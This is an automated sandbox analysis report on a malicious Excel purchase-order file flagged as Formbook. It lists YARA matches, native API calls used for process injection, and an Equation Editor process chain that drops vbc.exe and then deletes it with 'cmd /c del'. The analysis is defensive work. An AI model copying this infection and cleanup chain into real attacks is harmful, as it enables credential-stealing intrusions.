Source: 00000005.00000000.464491442.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.464491442.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.668043028.0000000000140000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.668043028.0000000000140000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 4_2_004030E3
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406043 4_2_00406043
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404618 4_2_00404618
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040681A 4_2_0040681A
Source: C:\Users\Public\vbc.exe Code function: 4_2_100010E0 4_2_100010E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000C074 4_2_1000C074
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000D2E1 4_2_1000D2E1
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000BB02 4_2_1000BB02
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000B590 4_2_1000B590
Source: C:\Users\Public\vbc.exe Code function: 4_2_100071AD 4_2_100071AD
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000E1FC 4_2_1000E1FC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D00D 5_2_0041D00D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8D3 5_2_0041B8D3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C9DC 5_2_0041C9DC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CC35 5_2_0041CC35
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C8E 5_2_00408C8E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C90 5_2_00408C90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C53B 5_2_0041C53B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D8B 5_2_00402D8B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0099E0C6 5_2_0099E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_009CD005 5_2_009CD005
Source: C:\Users\Public\vbc.exe Code function: 5_2_009B905A 5_2_009B905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A1D06D 5_2_00A1D06D
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A3040 5_2_009A3040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0099E2E9 5_2_0099E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A41238 5_2_00A41238
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A463BF 5_2_00A463BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_009C63DB 5_2_009C63DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_0099F3CF 5_2_0099F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A2305 5_2_009A2305
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A7353 5_2_009A7353
Source: C:\Users\Public\vbc.exe Code function: 5_2_009EA37B 5_2_009EA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_009B1489 5_2_009B1489
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D5485 5_2_009D5485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A2443E 5_2_00A2443E
Source: C:\Users\Public\vbc.exe Code function: 5_2_009DD47D 5_2_009DD47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_009BC5F0 5_2_009BC5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A351F 5_2_009A351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_009E6540 5_2_009E6540
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A4680 5_2_009A4680
Source: C:\Users\Public\vbc.exe Code function: 5_2_009AE6C1 5_2_009AE6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A42622 5_2_00A42622
Source: C:\Users\Public\vbc.exe Code function: 5_2_009EA634 5_2_009EA634
Source: C:\Users\Public\vbc.exe Code function: 5_2_009AC7BC 5_2_009AC7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A2579A 5_2_00A2579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D57C3 5_2_009D57C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3F8EE 5_2_00A3F8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_009AC85C 5_2_009AC85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_009C286D 5_2_009C286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A29B2 5_2_009A29B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A4098E 5_2_00A4098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_009B69FE 5_2_009B69FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A2394B 5_2_00A2394B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A25955 5_2_00A25955
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A53A83 5_2_00A53A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A4CBA4 5_2_00A4CBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0099FBD7 5_2_0099FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A2DBDA 5_2_00A2DBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_009C7B00 5_2_009C7B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FDDD 5_2_00A3FDDD
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D0D3B 5_2_009D0D3B
Source: C:\Users\Public\vbc.exe Code function: 5_2_009ACD5B 5_2_009ACD5B
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D2E2F 5_2_009D2E2F
Source: C:\Users\Public\vbc.exe Code function: 5_2_009BEE4C 5_2_009BEE4C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3CFB1 5_2_00A3CFB1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A12FDC 5_2_00A12FDC
Source: C:\Users\Public\vbc.exe Code function: 5_2_009B0F3F 5_2_009B0F3F
Source: C:\Users\Public\vbc.exe Code function: 5_2_009CDF7C 5_2_009CDF7C
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041D00D 5_1_0041D00D
Source: C:\Users\Public\vbc.exe Code function: 5_1_00401030 5_1_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041C53B 5_1_0041C53B
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B8D3 5_1_0041B8D3
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041C9DC 5_1_0041C9DC
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041CC35 5_1_0041CC35
Source: C:\Users\Public\vbc.exe Code function: 5_1_00408C8E 5_1_00408C8E
Source: C:\Users\Public\vbc.exe Code function: 5_1_00408C90 5_1_00408C90
Source: C:\Users\Public\vbc.exe Code function: 5_1_00402D8B 5_1_00402D8B
Source: C:\Users\Public\vbc.exe Code function: 5_1_00402D90 5_1_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_1_00402FB0 5_1_00402FB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02331238 7_2_02331238
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0228E2E9 7_2_0228E2E9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02292305 7_2_02292305
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022DA37B 7_2_022DA37B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02297353 7_2_02297353
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_023363BF 7_2_023363BF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0228F3CF 7_2_0228F3CF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022B63DB 7_2_022B63DB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022BD005 7_2_022BD005
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02293040 7_2_02293040
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022A905A 7_2_022A905A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0228E0C6 7_2_0228E0C6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02332622 7_2_02332622
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022DA634 7_2_022DA634
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02294680 7_2_02294680
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0229E6C1 7_2_0229E6C1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0229C7BC 7_2_0229C7BC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0231579A 7_2_0231579A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022C57C3 7_2_022C57C3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0231443E 7_2_0231443E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022CD47D 7_2_022CD47D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022A1489 7_2_022A1489
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022C5485 7_2_022C5485
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0229351F 7_2_0229351F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022D6540 7_2_022D6540
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022AC5F0 7_2_022AC5F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02343A83 7_2_02343A83
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022B7B00 7_2_022B7B00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0233CBA4 7_2_0233CBA4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0231DBDA 7_2_0231DBDA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0228FBD7 7_2_0228FBD7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022B286D 7_2_022B286D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0229C85C 7_2_0229C85C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0232F8EE 7_2_0232F8EE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02315955 7_2_02315955
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0231394B 7_2_0231394B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022929B2 7_2_022929B2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0233098E 7_2_0233098E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022A69FE 7_2_022A69FE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022C2E2F 7_2_022C2E2F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022AEE4C 7_2_022AEE4C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022A0F3F 7_2_022A0F3F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022BDF7C 7_2_022BDF7C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0232CFB1 7_2_0232CFB1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02302FDC 7_2_02302FDC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022C0D3B 7_2_022C0D3B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0229CD5B 7_2_0229CD5B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0232FDDD 7_2_0232FDDD
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008D00D 7_2_0008D00D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008C9DC 7_2_0008C9DC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008CC35 7_2_0008CC35
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00078C8E 7_2_00078C8E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00078C90 7_2_00078C90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00072D8B 7_2_00072D8B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00072D90 7_2_00072D90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00072FB0 7_2_00072FB0
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0099DF5C appears 121 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00A0F970 appears 84 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009E373B appears 245 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0041A4D0 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0041A3A0 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0099E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009E3F92 appears 132 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0228E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0228DF5C appears 120 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 022FF970 appears 84 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 022D3F92 appears 132 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 022D373B appears 245 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418720 NtClose, 5_2_00418720
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory, 5_2_004187D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041871B NtClose, 5_2_0041871B
Source: C:\Users\Public\vbc.exe Code function: 5_2_009900C4 NtCreateFile,LdrInitializeThunk, 5_2_009900C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00990048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00990048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00990078 NtResumeThread,LdrInitializeThunk, 5_2_00990078
Source: C:\Users\Public\vbc.exe Code function: 5_2_009907AC NtCreateMutant,LdrInitializeThunk, 5_2_009907AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098F9F0 NtClose,LdrInitializeThunk, 5_2_0098F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098F900 NtReadFile,LdrInitializeThunk, 5_2_0098F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0098FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0098FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0098FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0098FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0098FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0098FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0098FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0098FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0098FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0098FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0098FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009910D0 NtOpenProcessToken, 5_2_009910D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00990060 NtQuerySection, 5_2_00990060
Source: C:\Users\Public\vbc.exe Code function: 5_2_009901D4 NtSetValueKey, 5_2_009901D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0099010C NtOpenDirectoryObject, 5_2_0099010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00991148 NtOpenThread, 5_2_00991148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098F8CC NtWaitForSingleObject, 5_2_0098F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098F938 NtWriteFile, 5_2_0098F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_00991930 NtSetContextThread, 5_2_00991930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FAB8 NtQueryValueKey, 5_2_0098FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FA20 NtQueryInformationFile, 5_2_0098FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FA50 NtEnumerateValueKey, 5_2_0098FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FBE8 NtQueryVirtualMemory, 5_2_0098FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FB50 NtCreateKey, 5_2_0098FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FC30 NtOpenProcess, 5_2_0098FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FC48 NtSetInformationFile, 5_2_0098FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_00990C40 NtGetContextThread, 5_2_00990C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_00991D80 NtSuspendThread, 5_2_00991D80
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FD5C NtEnumerateKey, 5_2_0098FD5C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FE24 NtWriteVirtualMemory, 5_2_0098FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FFFC NtCreateProcessEx, 5_2_0098FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098FF34 NtQueueApcThread, 5_2_0098FF34
Source: C:\Users\Public\vbc.exe Code function: 5_1_004185F0 NtCreateFile, 5_1_004185F0
Source: C:\Users\Public\vbc.exe Code function: 5_1_004186A0 NtReadFile, 5_1_004186A0
Source: C:\Users\Public\vbc.exe Code function: 5_1_00418720 NtClose, 5_1_00418720
Source: C:\Users\Public\vbc.exe Code function: 5_1_004187D0 NtAllocateVirtualMemory, 5_1_004187D0
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041871B NtClose, 5_1_0041871B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022800C4 NtCreateFile,LdrInitializeThunk, 7_2_022800C4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022807AC NtCreateMutant,LdrInitializeThunk, 7_2_022807AC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_0227FAB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0227FAE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0227FAD0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0227FB68
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FB50 NtCreateKey,LdrInitializeThunk, 7_2_0227FB50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0227FBB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227F900 NtReadFile,LdrInitializeThunk, 7_2_0227F900
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227F9F0 NtClose,LdrInitializeThunk, 7_2_0227F9F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0227FED0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0227FFB4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0227FC60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0227FD8C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0227FDC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02280060 NtQuerySection, 7_2_02280060
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02280078 NtResumeThread, 7_2_02280078
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02280048 NtProtectVirtualMemory, 7_2_02280048
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022810D0 NtOpenProcessToken, 7_2_022810D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0228010C NtOpenDirectoryObject, 7_2_0228010C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02281148 NtOpenThread, 7_2_02281148
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022801D4 NtSetValueKey, 7_2_022801D4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FA20 NtQueryInformationFile, 7_2_0227FA20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FA50 NtEnumerateValueKey, 7_2_0227FA50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FBE8 NtQueryVirtualMemory, 7_2_0227FBE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227F8CC NtWaitForSingleObject, 7_2_0227F8CC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02281930 NtSetContextThread, 7_2_02281930
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227F938 NtWriteFile, 7_2_0227F938
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FE24 NtWriteVirtualMemory, 7_2_0227FE24
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FEA0 NtReadVirtualMemory, 7_2_0227FEA0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FF34 NtQueueApcThread, 7_2_0227FF34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FFFC NtCreateProcessEx, 7_2_0227FFFC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FC30 NtOpenProcess, 7_2_0227FC30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02280C40 NtGetContextThread, 7_2_02280C40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FC48 NtSetInformationFile, 7_2_0227FC48
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FC90 NtUnmapViewOfSection, 7_2_0227FC90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0227FD5C NtEnumerateKey, 7_2_0227FD5C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_02281D80 NtSuspendThread, 7_2_02281D80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_000885F0 NtCreateFile, 7_2_000885F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_000886A0 NtReadFile, 7_2_000886A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00088720 NtClose, 7_2_00088720
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_000887D0 NtAllocateVirtualMemory, 7_2_000887D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008871B NtClose, 7_2_0008871B
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: PO P232-2111228.xlsx Virustotal: Detection: 37%
Source: PO P232-2111228.xlsx ReversingLabs: Detection: 37%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PO P232-2111228.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDD24.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/24@5/5
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar, 4_2_00402012
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 4_2_0040411B
Source: explorer.exe, 00000006.00000000.470109547.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
